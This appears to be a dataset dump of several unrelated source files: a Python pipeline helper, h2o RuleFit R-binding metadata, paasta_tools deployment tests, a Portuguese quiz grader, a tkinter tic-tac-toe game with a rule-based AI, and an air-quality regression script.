text stringlengths 38 1.54M |
|---|
from enum import Enum
from functools import reduce
# Stage kinds a pipeline element may use.
modifier = Enum('modifier', 'map filter reduce window')

# Dispatch table: how each modifier applies a stage function to an iterable.
# `window` simply calls the function with the whole iterable at once.
__pipeline_functions = {
    modifier.map: map,
    modifier.filter: filter,
    modifier.reduce: reduce,
    modifier.window: lambda f, x: f(x)
}


def __apply_pipeline(input_iterable, pipeline):
    """Apply each pipeline stage in order; consumes the given pipeline list.

    Iterative implementation (the previous recursion added one stack frame
    per stage and popped from the front of the list each call); observable
    behavior is unchanged.
    """
    while pipeline:
        function_to_apply, function_type, *optional_parameters = pipeline.pop(0)
        # reduce collapses the iterable to a single value, so it may only be the last stage
        assert len(pipeline) == 0 or function_type != modifier.reduce
        input_iterable = __pipeline_functions[function_type](
            function_to_apply, input_iterable, *optional_parameters
        )
    return input_iterable


def apply_pipeline(input_iterable, pipeline):
    """
    Applies the pipeline to the input iterable.
    :param input_iterable: Input iterable.
    :param pipeline: List of pipeline elements, where each element is a tuple (function, pipey.modifier,
    *optional arguments).
    :return: Iterable over applied pipeline results.
    """
    # Work on a copy so the caller's pipeline list is left intact.
    return __apply_pipeline(input_iterable, pipeline[:])
|
# Codegen metadata: each string value is spliced verbatim into a generated
# R wrapper, so the R snippets' whitespace must be preserved exactly.
# NOTE(review): the nested "extensions" key (holding a validate_params block
# that references .gbm.map) looks like an accidental duplication of the outer
# dict's name — confirm against the generator's expected schema.
extensions = dict(
    extensions = dict(
        validate_params="""
# Required maps for different names params, including deprecated params
.gbm.map <- c("x" = "ignored_columns",
"y" = "response_column")
"""
    ),
    # R code that copies verified x/y arguments into the parms list.
    set_required_params="""
parms$training_frame <- training_frame
args <- .verify_dataxy(training_frame, x, y)
parms$ignored_columns <- args$x_ignore
parms$response_column <- args$y
""",
)
# Documentation metadata for the generated R binding (h2o.rulefit): preamble,
# per-parameter help text, R signature overrides, and a runnable example.
doc = dict(
    preamble="""
Build a RuleFit Model
Builds a Distributed RuleFit model on a parsed dataset, for regression or
classification.
""",
    params=dict(
        model_type="Specifies type of base learners in the ensemble. Must be one of: \"rules_and_linear\", \"rules\", \"linear\". "
                   "Defaults to rules_and_linear.",
        min_rule_length="Minimum length of rules. Defaults to 3.",
        max_rule_length="Maximum length of rules. Defaults to 3.",
    ),
    # R-side default signature values (emitted verbatim into the wrapper).
    signatures=dict(
        model_type="c(\"rules_and_linear\", \"rules\", \"linear\")"
    ),
    examples="""
library(h2o)
h2o.init()
# Import the titanic dataset:
f <- "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
coltypes <- list(by.col.name = c("pclass", "survived"), types=c("Enum", "Enum"))
df <- h2o.importFile(f, col.types = coltypes)
# Split the dataset into train and test
splits <- h2o.splitFrame(data = df, ratios = 0.8, seed = 1)
train <- splits[[1]]
test <- splits[[2]]
# Set the predictors and response; set the factors:
response <- "survived"
predictors <- c("age", "sibsp", "parch", "fare", "sex", "pclass")
# Build and train the model:
rfit <- h2o.rulefit(y = response,
x = predictors,
training_frame = train,
max_rule_length = 10,
max_num_rules = 100,
seed = 1)
# Retrieve the rule importance:
print(rfit@model$rule_importance)
# Predict on the test data:
h2o.predict(rfit, newdata = test)
"""
)
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import pytest
from mock import Mock
from mock import patch
from pytest import raises
from paasta_tools.cli.cmds import mark_for_deployment
from paasta_tools.cli.cmds.mark_for_deployment import NoSuchCluster
from paasta_tools.cli.cmds.wait_for_deployment import get_latest_marked_version
from paasta_tools.cli.cmds.wait_for_deployment import paasta_wait_for_deployment
from paasta_tools.cli.cmds.wait_for_deployment import validate_version_is_latest
from paasta_tools.cli.utils import NoSuchService
from paasta_tools.marathon_tools import MarathonServiceConfig
from paasta_tools.paastaapi import ApiException
from paasta_tools.remote_git import LSRemoteException
from paasta_tools.utils import DeploymentVersion
from paasta_tools.utils import TimeoutError
class fake_args:
    """Stand-in for the parsed argparse namespace given to paasta_wait_for_deployment."""

    deploy_group = "test_deploy_group"
    service = "test_service"
    git_url = ""
    commit = "d670460b4b4aece5915caf5c68d12f560a9fe3e4"
    image_version = None
    soa_dir = "fake_soa_dir"
    timeout = 0  # don't actually wait in tests
    verbose = False
    polling_interval = 5
    diagnosis_interval = 15
    time_before_first_diagnosis = 15
def fake_bounce_status_resp(**overrides):
    """Return a Mock bounce-status API response.

    The defaults describe a healthy, fully-bounced instance; keyword
    arguments override individual fields for specific test scenarios.
    """
    fields = {
        "expected_instance_count": 1,
        "running_instance_count": 1,
        "desired_state": "start",
        "app_count": 1,
        "active_shas": [["abc123", "cfg"]],
        "active_versions": [["abc123", None, "cfg"]],
        "deploy_status": "Running",
    }
    fields.update(overrides)
    return Mock(**fields)
@pytest.mark.parametrize(
    "side_effect,expected",
    [
        (ApiException(status=500, reason=""), False),  # api bad
        (ApiException(status=599, reason=""), False),  # temporary api issue
        (ApiException(status=404, reason=""), False),  # instance dne
        ([""], True),  # status=204 produces empty response
        (  # instance stopped
            [fake_bounce_status_resp(expected_instance_count=0)],
            True,
        ),
        ([fake_bounce_status_resp(desired_state="stop")], True),  # instance stopped
        (  # bounce in-progress
            [
                fake_bounce_status_resp(
                    active_shas=[["wrong1", "cfg"], ["abc123", "cfg"]],
                    active_versions=[["wrong1", None, "cfg"], ["abc123", None, "cfg"]],
                )
            ],
            False,
        ),
        (  # previous bounces not yet finished
            [
                fake_bounce_status_resp(
                    active_shas=[
                        ["wrong1", "cfg"],
                        ["wrong2", "cfg"],
                        ["abc123", "cfg"],
                    ],
                    active_versions=[
                        ["wrong1", None, "cfg"],
                        ["wrong2", None, "cfg"],
                        ["abc123", None, "cfg"],
                    ],
                )
            ],
            False,
        ),
        (  # bounce not started
            [
                fake_bounce_status_resp(
                    active_shas=[["wrong1", "cfg"]],
                    active_versions=[["wrong1", None, "cfg"]],
                )
            ],
            False,
        ),
        (  # instance not running
            [fake_bounce_status_resp(deploy_status="NotRunning")],
            False,
        ),
        (  # not enough instances up
            [fake_bounce_status_resp(expected_instance_count=10)],
            False,
        ),
        ([fake_bounce_status_resp()], True),  # completed
    ],
)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.client.get_paasta_oapi_client",
    autospec=True,
)
def test_check_if_instance_is_done(
    mock_get_paasta_oapi_client, mock__log, side_effect, expected
):
    """check_if_instance_is_done verdicts across API errors and bounce states.

    Each parametrized case feeds one bounce-status response (or exception)
    through a mocked oapi client and checks the boolean verdict.
    """
    mock_paasta_api_client = Mock()
    # The code under test catches the client's own api_error type.
    mock_paasta_api_client.api_error = ApiException
    mock_paasta_api_client.service.bounce_status_instance.side_effect = side_effect
    mock_get_paasta_oapi_client.return_value = mock_paasta_api_client
    assert expected == mark_for_deployment.check_if_instance_is_done(
        service="fake_service",
        instance="fake_instance",
        cluster="fake_cluster",
        version=DeploymentVersion(sha="abc123", image_version=None),
        instance_config=mock_marathon_instance_config("fake_instance"),
    )
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.load_system_paasta_config", autospec=True
)
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.get_instance_configs_for_service_in_deploy_group_all_clusters",
    autospec=True,
)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.check_if_instance_is_done", autospec=True
)
def test_wait_for_deployment(
    mock_check_if_instance_is_done,
    mock__log,
    mock_get_instance_configs_for_service_in_deploy_group_all_clusters,
    mock_load_system_paasta_config,
):
    """wait_for_deployment: times out while instances lag, returns 0 once all are done.

    Three scenarios share the same mocks:
      1. instance3 never finishes and asyncio.as_completed raises -> TimeoutError
      2. every instance in both clusters reports done -> returns 0
      3. instance3 still pending with timeout=0 -> TimeoutError
    """
    mock_get_instance_configs_for_service_in_deploy_group_all_clusters.return_value = {
        "cluster1": [
            mock_marathon_instance_config("instance1"),
            mock_marathon_instance_config("instance2"),
            mock_marathon_instance_config("instance3"),
        ],
    }

    # Only instance1/instance2 ever report "done"; instance3 stays pending.
    def check_if_instance_is_done_side_effect(
        service, instance, cluster, version, instance_config, api=None
    ):
        return instance in ["instance1", "instance2"]

    mock_check_if_instance_is_done.side_effect = check_if_instance_is_done_side_effect
    mock_load_system_paasta_config.return_value.get_api_endpoints.return_value = {
        "cluster1": "some_url_1",
        "cluster2": "some_url_2",
    }
    mock_load_system_paasta_config.return_value.get_mark_for_deployment_max_polling_threads.return_value = (
        4
    )
    # Scenario 1: polling is cut short by an asyncio timeout.
    with raises(TimeoutError):
        with patch(
            "asyncio.as_completed", side_effect=[asyncio.TimeoutError], autospec=True
        ):
            asyncio.run(
                mark_for_deployment.wait_for_deployment(
                    "service", "fake_deploy_group", "somesha", "/nail/soa", 1
                )
            )
    # Scenario 2: all instances in both clusters complete -> success (0).
    mock_get_instance_configs_for_service_in_deploy_group_all_clusters.return_value = {
        "cluster1": [
            mock_marathon_instance_config("instance1"),
            mock_marathon_instance_config("instance2"),
        ],
        "cluster2": [
            mock_marathon_instance_config("instance1"),
            mock_marathon_instance_config("instance2"),
        ],
    }
    with patch("sys.stdout", autospec=True, flush=Mock()):
        assert (
            asyncio.run(
                mark_for_deployment.wait_for_deployment(
                    "service", "fake_deploy_group", "somesha", "/nail/soa", 5
                )
            )
            == 0
        )
    # Scenario 3: instance3 in cluster2 never completes and the timeout is 0.
    mock_get_instance_configs_for_service_in_deploy_group_all_clusters.return_value = {
        "cluster1": [
            mock_marathon_instance_config("instance1"),
            mock_marathon_instance_config("instance2"),
        ],
        "cluster2": [
            mock_marathon_instance_config("instance1"),
            mock_marathon_instance_config("instance3"),
        ],
    }
    with raises(TimeoutError):
        asyncio.run(
            mark_for_deployment.wait_for_deployment(
                "service", "fake_deploy_group", "somesha", "/nail/soa", 0
            )
        )
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.load_system_paasta_config", autospec=True
)
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.PaastaServiceConfigLoader", autospec=True
)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
def test_wait_for_deployment_raise_no_such_cluster(
    mock__log,
    mock_paasta_service_config_loader,
    mock_load_system_paasta_config,
):
    """wait_for_deployment raises NoSuchCluster for a cluster with no API endpoint."""
    mock_load_system_paasta_config.return_value.get_api_endpoints.return_value = {
        "cluster1": "some_url_1",
        "cluster2": "some_url_2",
    }
    # The service claims to run on cluster3, which has no endpoint above.
    mock_paasta_service_config_loader.return_value.clusters = ["cluster3"]
    with raises(NoSuchCluster):
        asyncio.run(
            mark_for_deployment.wait_for_deployment(
                "service", "deploy_group_3", "somesha", "/nail/soa", 0
            )
        )
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_service_name", autospec=True)
@patch("paasta_tools.cli.cmds.mark_for_deployment.wait_for_deployment", autospec=True)
def test_paasta_wait_for_deployment_return_1_when_no_such_service(
    mock_wait_for_deployment, mock_validate_service_name
):
    """Fails fast (exit 1) on an unknown service and never starts polling."""
    mock_validate_service_name.side_effect = NoSuchService("Some text")
    assert paasta_wait_for_deployment(fake_args) == 1
    # wait_for_deployment must never be reached when validation fails.
    assert mock_wait_for_deployment.call_args_list == []
    assert mock_validate_service_name.called
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_service_name", autospec=True)
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_deploy_groups", autospec=True)
@patch("paasta_tools.cli.cmds.mark_for_deployment.wait_for_deployment", autospec=True)
def test_paasta_wait_for_deployment_return_1_when_deploy_group_not_found(
    mock_wait_for_deployment, mock_list_deploy_groups, mock_validate_service_name
):
    """Fails fast (exit 1) when fake_args' deploy group isn't among the service's groups."""
    mock_list_deploy_groups.return_value = {"another_test_deploy_group"}
    assert paasta_wait_for_deployment(fake_args) == 1
    # Polling must never start for an unknown deploy group.
    assert mock_wait_for_deployment.call_args_list == []
    assert mock_validate_service_name.called
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.load_system_paasta_config", autospec=True
)
@patch(
    "paasta_tools.cli.cmds.mark_for_deployment.PaastaServiceConfigLoader", autospec=True
)
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_service_name", autospec=True)
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_git_sha", autospec=True)
@patch(
    "paasta_tools.cli.cmds.wait_for_deployment.validate_version_is_latest",
    autospec=True,
)
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_deploy_groups", autospec=True)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
@patch("paasta_tools.cli.cmds.wait_for_deployment._log", autospec=True)
def test_paasta_wait_for_deployment_return_0_when_no_instances_in_deploy_group(
    mock__log1,
    mock__log2,
    mock_list_deploy_groups,
    mock_validate_version_is_latest,
    mock_validate_git_sha,
    mock_validate_service_name,
    mock_paasta_service_config_loader,
    mock_load_system_paasta_config,
    system_paasta_config,  # pytest fixture, presumably defined in conftest.py
):
    """Succeeds (exit 0) when the deploy group exists but owns no instances."""
    mock__log1.return_value = None
    mock__log2.return_value = None
    mock_load_system_paasta_config.return_value = system_paasta_config
    # The only instance belongs to "fake_deploy_group", not fake_args' group.
    mock_paasta_service_config_loader.return_value.instance_configs.return_value = [
        mock_marathon_instance_config("some_instance")
    ]
    mock_list_deploy_groups.return_value = {"test_deploy_group"}
    mock_validate_git_sha.return_value = fake_args.commit
    assert paasta_wait_for_deployment(fake_args) == 0
    assert mock_validate_service_name.called
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_get_latest_marked_version_good(mock_list_remote_refs):
    """Picks the newest paasta-<group>-<timestamp>-deploy tag for the exact group."""
    # Two plain fake_group1 tags, one other group, and one sub-group tag
    # (fake_group1.everywhere) whose sha must not win.
    mock_list_remote_refs.return_value = {
        "refs/tags/paasta-fake_group1-20161129T203750-deploy": "968b948b3fca457326718dc7b2e278f89ccc5c87",
        "refs/tags/paasta-fake_group1-20161117T122449-deploy": "eac9a6d7909d09ffec00538bbc43b64502aa2dc0",
        "refs/tags/paasta-fake_group2-20161125T095651-deploy": "a4911648beb2e53886658ba7ea7eb93d582d754c",
        "refs/tags/paasta-fake_group1.everywhere-20161109T223959-deploy": "71e97ec397a3f0e7c4ee46e8ea1e2982cbcb0b79",
    }
    assert get_latest_marked_version("", "fake_group1") == DeploymentVersion(
        sha="968b948b3fca457326718dc7b2e278f89ccc5c87", image_version=None
    )
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_get_latest_marked_version_with_image_good(mock_list_remote_refs):
    """The `+<image>` suffix in a tag is parsed into DeploymentVersion.image_version."""
    mock_list_remote_refs.return_value = {
        "refs/tags/paasta-fake_group1+20161128image-20161129T203750-deploy": "968b948b3fca457326718dc7b2e278f89ccc5c87",
        "refs/tags/paasta-fake_group1-20161117T122449-deploy": "eac9a6d7909d09ffec00538bbc43b64502aa2dc0",
        "refs/tags/paasta-fake_group2-20161125T095651-deploy": "a4911648beb2e53886658ba7ea7eb93d582d754c",
        "refs/tags/paasta-fake_group1.everywhere-20161109T223959-deploy": "71e97ec397a3f0e7c4ee46e8ea1e2982cbcb0b79",
    }
    assert get_latest_marked_version("", "fake_group1") == DeploymentVersion(
        sha="968b948b3fca457326718dc7b2e278f89ccc5c87", image_version="20161128image"
    )
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_get_latest_marked_version_bad(mock_list_remote_refs):
    """Returns None when no tag matches the requested deploy group."""
    mock_list_remote_refs.return_value = {
        "refs/tags/paasta-fake_group2-20161129T203750-deploy": "968b948b3fca457326718dc7b2e278f89ccc5c87"
    }
    assert get_latest_marked_version("", "fake_group1") is None
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_validate_deploy_group_when_is_git_not_available(mock_list_remote_refs, capsys):
    """validate_version_is_latest degrades gracefully (None) when git ls-remote fails."""
    test_error_message = "Git error"
    mock_list_remote_refs.side_effect = LSRemoteException(test_error_message)
    assert (
        validate_version_is_latest(
            DeploymentVersion(sha="fake sha", image_version=None),
            "fake_git_url",
            "fake_group",
            "fake_service",
        )
        is None
    )
def mock_marathon_instance_config(fake_name) -> "MarathonServiceConfig":
    """Build a minimal MarathonServiceConfig for tests, varying only the instance name."""
    settings = dict(
        service="fake_service",
        cluster="fake_cluster",
        instance=fake_name,
        config_dict={"deploy_group": "fake_deploy_group"},
        branch_dict=None,
        soa_dir="fake_soa_dir",
    )
    return MarathonServiceConfig(**settings)
def test_compose_timeout_message():
    """Timeout message lists per-cluster status/logs commands and a retry command."""
    remaining_instances = {
        "cluster1": ["instance1", "instance2"],
        "cluster2": ["instance3"],
        "cluster3": [],  # a cluster with nothing pending
    }
    message = mark_for_deployment.compose_timeout_message(
        remaining_instances,
        1,
        "fake_group",
        "someservice",
        DeploymentVersion(sha="some_git_sha", image_version="extrastuff"),
    )
    assert (
        " paasta status -c cluster1 -s someservice -i instance1,instance2" in message
    )
    assert " paasta status -c cluster2 -s someservice -i instance3" in message
    assert (
        " paasta logs -c cluster1 -s someservice -i instance1,instance2 -C deploy -l 1000"
        in message
    )
    assert (
        " paasta logs -c cluster2 -s someservice -i instance3 -C deploy -l 1000"
        in message
    )
    # The retry command must carry the image-version flag when one is set.
    assert (
        " paasta wait-for-deployment -s someservice -l fake_group -c some_git_sha --image-version extrastuff"
        in message
    )
|
# Quiz-grading script: the teacher enters a 10-question answer key, then each
# student's answers are scored until the operator types "S" to stop; finally
# the best/worst scores and the class average are reported.
gabguard = ''
maior = 0      # best score seen so far
menor = None   # worst score seen so far (None until the first student is graded)
ponttotal = countalun = 0
print('='*50)
print('{: ^50}'.format('GABARITO'))
print('='*50)
for e in range(1, 11):
    gabarito = input('{} - Digite o gabarito das notas: '.format(e)).upper()[0]
    gabguard = gabguard + gabarito
continuar = ''
while continuar != 'S':
    contacer = 0
    print('='*50)
    print('{: ^50}'.format('GABARITO ALUNO'))
    print('='*50)
    for f in range(1, 11):
        # [:1] keeps only the first character (and is safe on empty input),
        # matching how the answer key itself was captured.
        gabaalun = input('{} - Digite a resposta: '.format(f)).upper()[:1]
        # Compare directly against the key for question f instead of the
        # original 10-branch or-chain.
        if gabaalun == gabguard[f - 1]:
            contacer = contacer + 1
    if contacer > maior:
        maior = contacer
    # Fixed: the minimum previously only updated when the score was exactly 1.
    if menor is None or contacer < menor:
        menor = contacer
    countalun = countalun + 1
    ponttotal = ponttotal + contacer
    continuar = input('\nDigite qualquer caractere para continuar\nou "S" Para sair: ').upper()
# Fixed: true average instead of integer (floor) division.
medalun = ponttotal / countalun
print('='*50)
print('{: ^50}'.format('RESULTADO'))
print('='*50)
print('Maior Acerto: ', maior)
print('Menor Acerto', menor)
print('Total de Alunos', countalun)
print('Média dos Alunos: ', medalun)
# Game made by OrangoMango (https://orangomango.github.io)
from tkinter import *
from tkinter import messagebox
import random, time
class GridFrame:
    """One clickable cell of the 3x3 board: a bordered Frame holding a Label."""

    def __init__(self, game):
        self.game = game  # back-reference to the owning Game
        self.frame = Frame(game.tk, bd=1)
        self.id = Label(self.frame, text="   ", font="Calibri 20 bold", relief="solid")
        self.id.bind("<Button-1>", self.onclick)
        self.id.pack()

    def grid(self, **kwargs):
        """Place the frame and remember its board coordinates."""
        try:
            self.x, self.y = kwargs["row"], kwargs["column"] #save grid coordinates
        except:  # NOTE(review): bare except; only KeyError is expected here
            self.x, self.y = 0, 0
        self.frame.grid(kwargs)

    def onclick(self, event):
        #print("Onclick")
        # Delegate the move to the game using this cell's saved coordinates.
        self.game.set_symbol(self.x, self.y, self.game.active_player)
class Game:
    """Main tic-tac-toe ("Tris") window: 3x3 board, status label and running timer.

    Board state lives in self.actualgame, a flat list of 9 cells indexed
    pos = y*3 + x, where 0 = empty, 1 = player one ("O"), 2 = player two / AI ("X").
    """

    def __init__(self, data):
        # data = [player1_name, player2_name, ai_enabled, who_starts]
        self.t1 = time.time()  # game start time, drives the on-screen timer
        self.gameIsRunning = True
        self.ai = data[2]
        self.playernames = [data[0], data[1]]
        #print(self.playernames)
        self.tk = Tk()
        self.tk.title("Tris Game")
        self.tk.geometry("400x200")
        self.actualgame = [0] * 9 #actual game progress (1 -> x 2 -> o)
        self.active_player = 1
        self.grids = []
        # Build the 3x3 board of clickable cells.
        for y in range(3):
            for x in range(3):
                f = GridFrame(self)
                f.grid(column=y, row=x)
                self.grids.append(f)
        self.plabel = Label(self.tk, text="Actual player: {0}".format(self.playernames[self.active_player-1]), font="Calibri 20 bold")
        self.plabel.place(x=0, y=120, anchor="nw")
        self.timel = Label(self.tk, text="{0:.2f}sec".format(time.time()-self.t1), fg="red", font="Calibri 20 bold")
        self.timel.place(x=0, y=165, anchor="nw")
        if data[3] == 2 and self.ai: # If AI is first the AI will place
            self.place_ai()

    def mainloop(self):
        """Hand-rolled event loop: refresh the timer ~25x/sec until the game ends."""
        while True:
            if self.gameIsRunning:
                self.timel.config(text="{0:.2f}sec".format(time.time()-self.t1))
                self.tk.update()
                time.sleep(0.04)
            else:
                self.ntime = time.time()-self.t1  # final game duration
                break

    def next_player(self):
        self.active_player = 2 if self.active_player == 1 else 1 #set the next player
        self.plabel.config(text="Actual player: {0}".format(self.playernames[self.active_player-1])) #update label
        self.tk.update()

    def check_grid(self, x, y):
        pos = y*3+x
        return self.actualgame[pos] #returns the item value in self.actualgame using x and y pos

    def victory(self, pn): #check is victory is possible
        """Return True if player *pn* currently holds three in a row."""
        list = self.actualgame  # NOTE(review): shadows the builtin `list`
        # rows
        if (list[0:3] == [pn, pn, pn]) or (list[3:6] == [pn, pn, pn]) or (list[6:9] == [pn, pn, pn]):
            return True
        # columns
        for x in range(3):
            if (list[x] == pn) and (list[x+3] == pn) and (list[x+6] == pn):
                return True
        # diagonals
        if (list[0] == pn) and (list[4] == pn) and (list[8] == pn):
            return True
        if (list[2] == pn) and (list[4] == pn) and (list[6] == pn):
            return True
        return False

    def random_set(self): #get a random index of self.actualgame
        empty = [x for x in range(9) if self.actualgame[x] == 0]
        return random.choice(empty)

    def set_from_number(self, n, playern): #set symbol from a index
        y = n // 3  # NOTE(review): x and y are computed but never used below
        x = n % 3
        self.grids[n].id.config(text="O" if playern == 1 else "X")
        self.tk.update()
        self.tk.update_idletasks()
        self.actualgame[n] = playern

    def set_on_random_corner(self):
        """Return a random empty corner index (0/2/6/8), or None if all taken."""
        empty_corners = []
        if self.actualgame[0] == 0:
            empty_corners.append(0)
        if self.actualgame[2] == 0:
            empty_corners.append(2)
        if self.actualgame[6] == 0:
            empty_corners.append(6)
        if self.actualgame[8] == 0:
            empty_corners.append(8)
        if empty_corners == []:
            return None
        return random.choice(empty_corners)

    def set_on_random_edge(self):
        """Return a random empty edge index (1/3/5/7), or None if all taken."""
        empty_edges = []
        if self.actualgame[1] == 0:
            empty_edges.append(1)
        if self.actualgame[3] == 0:
            empty_edges.append(3)
        if self.actualgame[5] == 0:
            empty_edges.append(5)
        if self.actualgame[7] == 0:
            empty_edges.append(7)
        if empty_edges == []:
            return None
        return random.choice(empty_edges)

    def ai_insert(self): #AI
        """Pick the AI's move index: win > block > center > tactical edge/corner > random."""
        empty = [x for x in range(9) if self.actualgame[x] == 0]
        emn = len(empty)
        backup = self.actualgame[:]  # trial moves are simulated on copies
        for x in range(emn): #check if victory is possible
            self.actualgame = backup[:]
            self.actualgame[empty[x]] = 2
            if self.victory(2): #if victory
                self.actualgame = backup[:]
                return empty[x] #return the index
        for x in range(emn): #if there is no victory, make possible that computer can not lose
            self.actualgame = backup[:]
            self.actualgame[empty[x]] = 1
            if self.victory(1): #if the player can win
                self.actualgame = backup[:]
                return empty[x] #return player index
        self.actualgame = backup[:]
        if self.actualgame[4] == 0: # Place symbol on center if possible
            return 4;
        elif self.opposite_diagonal(1 if self.active_player == 2 else 2):
            # Opponent holds an opposite diagonal: answer on an edge to avoid a fork.
            # NOTE(review): if no edge is free this branch returns None — confirm
            # that cannot happen when a diagonal trap is detected.
            if not (self.set_on_random_edge() is None):
                return self.set_on_random_edge()
        elif not (self.set_on_random_corner() is None): # Place symbol on a corner if possible
            return self.set_on_random_corner()
        else:
            return self.random_set() #if there are no possibilities, return a random index

    def no_insert(self):
        return not (0 in self.actualgame) #if the board is full

    def quit(self):
        self.tk.destroy()

    def opposite_diagonal(self, op):
        """True when we own the center and *op* holds both ends of a diagonal."""
        if self.actualgame[4] == self.active_player:
            if (self.actualgame[0] == op and self.actualgame[8] == op) or (self.actualgame[2] == op and self.actualgame[6] == op):
                return True
            else:
                return False

    def set_symbol(self, x, y, playern):
        """Handle a human move at (x, y), then hand over to AI or next player."""
        if self.check_grid(x, y) == 0: #You can only place symbols if the frame doesn't contain another symbol
            pos = y*3+x
            self.grids[pos].id.config(text="O" if playern == 1 else "X")
            self.tk.update()
            self.tk.update_idletasks()
            self.actualgame[pos] = playern
            if self.victory(self.active_player): #if victory
                self.gameIsRunning = False
                messagebox.showinfo("Game Over", "{0} won the game".format(self.playernames[self.active_player-1]))
                self.quit()
            elif self.no_insert(): #if the board is full
                self.gameIsRunning = False
                messagebox.showinfo("Game Over", "Game has finished, no winner")
                self.quit()
            else:
                if not self.ai:
                    self.next_player()
                elif self.ai == True:
                    self.place_ai()
                else:
                    raise Exception('No ai is active')

    def place_ai(self):
        """Let the AI (player 2) move, then check for game over and hand back."""
        self.next_player()
        self.plabel.config(text="Actual player: {0}".format(self.playernames[self.active_player-1])) #update label
        self.tk.update()
        time.sleep(0.5)  # brief pause so the AI move is visible
        self.set_from_number(self.ai_insert(), 2)
        if self.victory(self.active_player):
            self.gameIsRunning = False
            messagebox.showinfo("Game Over", "AI won the game")
            self.quit()
        elif self.no_insert():
            self.gameIsRunning = False
            messagebox.showinfo("Game Over", "Game has finished, no winner")
            self.quit()
        else:
            self.next_player()
            self.plabel.config(text="Actual player: {0}".format(self.playernames[self.active_player-1])) #update label
            self.tk.update()
class Setup:
    """Pre-game wizard: collects player names, the AI flag and who starts."""

    def __init__(self):
        self.tk = Tk()
        self.tk.title("Tris setup wizard")
        self.infoboxes = []  # (Label, Entry) pairs, one per player
        self.txtvar = StringVar()  # mirrors the player-2 entry so it can be swapped with "AI"
        for x in range(2):
            l = Label(self.tk, text="Player{0} name:".format(x+1))
            l.grid(column=0, row=x)
            e = Entry()
            e.grid(column=1, row=x)
            self.infoboxes.append((l,e))
        self.infoboxes[1][1].config(textvariable=self.txtvar)
        self.odata = ""  # stashes the typed player-2 name while "Against AI" is ticked

        def ck():
            # Toggle the player-2 entry between the typed name and a fixed "AI" label.
            if self.infoboxes[1][1]['state'] == 'normal':
                # NOTE(review): Tk's documented state value is "disabled" — confirm
                # "disable" behaves as intended on the target Tk version.
                self.infoboxes[1][1]['state'] = "disable"
                self.odata = self.txtvar.get()
                self.txtvar.set("AI")
            else:
                self.infoboxes[1][1]['state'] = "normal"
                self.txtvar.set(self.odata)

        self.aivar = IntVar()
        self.ck = Checkbutton(self.tk, text="Against AI", variable=self.aivar, command=ck)
        self.ck.grid(row=2, column=0, columnspan=2)
        stl = Label(self.tk, text="Who starts?")
        stl.grid(row=3, column=0)
        self.whostarts = IntVar()
        self.whostarts.set(1)
        r1 = Radiobutton(self.tk, text="Player1", value=1, variable=self.whostarts)
        r2 = Radiobutton(self.tk, text="Player2", value=2, variable=self.whostarts)
        r1.grid(row=4, column=0)
        r2.grid(row=4, column=1)
        okb = Button(self.tk, text="Save data", command=self.ok)
        okb.grid(row=5, column=3)
        self.start = False  # set True by ok(); polled by the __main__ loop

    def ok(self):
        """Validate the form and publish results as [name1, name2, ai?, who_starts]."""
        #print(self.whostarts.get())
        self.results = [self.infoboxes[0][1].get(), self.infoboxes[1][1].get(), bool(self.aivar.get()), self.whostarts.get()]
        if "" in self.results:
            messagebox.showerror("Invalid input", "Invalid name given")
            return
        self.start = True
if __name__ == '__main__':
    # Run the setup wizard until the player submits valid data, then start the game.
    wizard = Setup()
    while not wizard.start:  # setup loop
        time.sleep(0.01)
        wizard.tk.update()
    wizard.tk.destroy()
    Game(wizard.results).mainloop()
|
import os
import pandas as pd
import numpy as np
import modeling as md
from sklearn.preprocessing import StandardScaler
def main():
    """Standardize the air-quality dataset, train one model per training country,
    and evaluate predictions on the held-out countries.

    Reads data/master_with_aq.csv; PM2.5 is the regression target, everything
    else (minus label/country columns) the features.
    """
    df = pd.read_csv('data/master_with_aq.csv', header=0)
    df = df.drop(['Unnamed: 0', 'Label', 'Country'], axis=1)
    # z-score every column in place
    df[df.columns] = StandardScaler().fit_transform(df)
    print(df.head())
    pm25 = df['PM2.5']  # regression target
    df = df.drop(['PM2.5'], axis=1)
    nums = np.arange(0, 360, 19)  # indices of where each new country starts in df
    train_indices = np.random.choice(nums, 13, replace=False)  # randomly select 13 countries for training
    # One model per training country (replaces 13 copy-pasted build_model calls).
    models = [md.build_model(i, train_indices, pm25, df) for i in range(13)]
    # get indices of countries not in training set to use for test set
    test_indices = np.setdiff1d(nums, np.sort(train_indices))
    all_Y_actual, all_Y_pred = md.model_driver(test_indices, pm25, df, models)
    # calculate rmse to evaluate the quality of each of the models predictions
    md.model_evaluation(all_Y_actual, all_Y_pred)
# Show where relative paths (data/master_with_aq.csv) resolve from, then run.
print(os.getcwd(), '\n')
main()
